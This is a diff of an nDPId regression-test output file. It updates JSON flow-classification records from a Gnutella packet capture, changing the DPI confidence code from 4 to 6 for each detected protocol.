-00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3988,8 +3988,8 @@ 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4010,11 +4010,11 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4055,13 +4055,13 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 